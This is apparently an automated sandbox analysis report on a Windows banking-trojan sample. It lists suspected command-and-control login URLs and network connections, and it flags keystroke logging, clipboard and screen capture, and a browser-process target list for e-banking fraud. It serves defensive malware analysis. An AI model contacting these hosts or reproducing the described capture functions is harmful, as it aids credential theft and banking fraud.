Source: svchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752825184.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyzuk.com/login.php
Source: svchost.exe, 00000002.00000003.1833024011.0000000002FCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20241112-0425-1706-a2c8-02526792f211
Source: Z8eHwAvqAh.exe, Z8eHwAvqAh.exe, 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Z8eHwAvqAh.exe, 00000001.00000003.1299697107.0000000000618000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937215449.0000000000874000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1821543963.0000000002F7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877677904.0000000007B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1351426120.0000000008A2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817962538.0000000008A1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744360406.0000000008B37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1865179926.0000000008A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1928585364.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816882374.0000000008A31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744149224.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1875873906.0000000008B30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1340645113.0000000008A28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1340346097.0000000000879000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1947638963.0000000007B62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1933625834.0000000007B01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1919264226.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1843150667.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1942659030.0000000007B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: svchost.exe, 00000002.00000003.1332387739.0000000008A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899110396.0000000002F7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1340645113.0000000008A16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817401118.0000000000879000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743082395.0000000008B3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816085614.0000000008B7C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1942659030.0000000007B1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743951746.0000000002F92000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1864475794.0000000008B7F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816672453.0000000002FD3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1842752694.0000000008B81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816282989.0000000008B69000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877431958.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1919995512.0000000008A1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1836163122.0000000008A4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877431958.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1332374895.0000000008A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1836522113.0000000008B6A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913606009.000000000087F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1332374895.0000000008A5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1939092513.0000000007B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt
Source: svchost.exe, 00000002.00000003.1834480430.0000000008A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841769162.0000000008A50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1339757003.0000000008A51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt)
Source: svchost.exe, 00000002.00000003.1834480430.0000000008A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1332374895.0000000008A53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1339757003.0000000008A51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt:
Source: svchost.exe, 00000002.00000003.1960203914.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1815939422.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1619867752.0000000002F7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1815939422.0000000008AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816284396.0000000008BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
Source: svchost.exe, 00000002.00000003.1902470877.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878283204.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870864138.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1815939422.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889173906.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817804500.0000000008B08000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1867135631.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835709679.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1815939422.0000000008AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816284396.0000000008BA0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1815939422.0000000008B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ampproject.org
Source: svchost.exe, 00000002.00000003.1902470877.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878283204.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870864138.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1745258070.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889173906.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817804500.0000000008B08000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1867135631.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835709679.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008B09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1815939422.0000000008B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d15wejze7d2tlj.cloudfront.net/v1
Source: svchost.exe, 00000002.00000003.1744736158.0000000008AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1939082881.0000000000872000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1945869923.0000000007B89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1745513313.0000000002F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1361146855.0000000002F09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
Source: svchost.exe, 00000002.00000003.1753426788.0000000008ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1753381313.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795007934.0000000000871000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1831046743.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752892568.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752825184.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796247688.0000000002F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/login.php
Source: svchost.exe, 00000002.00000003.1815939422.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1815939422.0000000008AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816284396.0000000008BA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/wp-json/
Source: svchost.exe, 00000002.00000003.1945741706.0000000008B9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1945901222.0000000008B9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1960962070.0000000008BA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://puzylyp.com/
Source: svchost.exe, 00000002.00000003.1344588140.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1946789829.0000000007B3E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1946620644.0000000008A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744793838.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1945899500.0000000008AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1946749120.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1361292804.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1944298143.0000000007B3E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1356693256.0000000002F23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1619705452.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1946080389.0000000008AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://puzylyp.com/login.php
Source: svchost.exe, 00000002.00000003.1960203914.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1960801162.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1362973113.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1944302954.0000000007B01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744416945.0000000008A4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1960248294.0000000007B5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1744736158.0000000008B04000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1777075512.0000000008A4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1961288192.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1619905614.0000000002F87000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743948651.0000000008ABD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1619705452.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629863031.0000000002FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/login.php
Source: svchost.exe, 00000002.00000003.1960203914.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1619867752.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/wp-json/
Source: unknownNetwork traffic detected: HTTP traffic on port 62051 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62050
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 62050 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62051
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62049 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64058 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64058
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62049
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 99.83.170.3:443 -> 192.168.2.10:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:64056 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:64058 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:62050 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:62051 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Contains functionality to capture and log keystrokes
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: [tab]33_2_01302F40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: [del]33_2_01302F40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: [del]33_2_01302F40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: [ins]33_2_01302F40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012F317E memset,GlobalLock,GetCurrentThreadId,GetGUIThreadInfo,GetOpenClipboardWindow,GetActiveWindow,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GlobalUnlock,22_2_012F317E
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012E9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,22_2_012E9530
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_01599530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,25_2_01599530
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AE9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,27_2_00AE9530
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012A9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,29_2_012A9530
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01119530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,31_2_01119530
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012F9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,33_2_012F9530
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_013054A0 PathAddBackslashA,GetDesktopWindow,GetWindowDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,ReleaseDC,22_2_013054A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01302F40 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii,33_2_01302F40

E-Banking Fraud

barindex
Checks if browser processes are running
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex22_2_012F78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex22_2_012F78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex22_2_012F78A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe22_2_012F6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe22_2_012F6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe22_2_012F6CA0
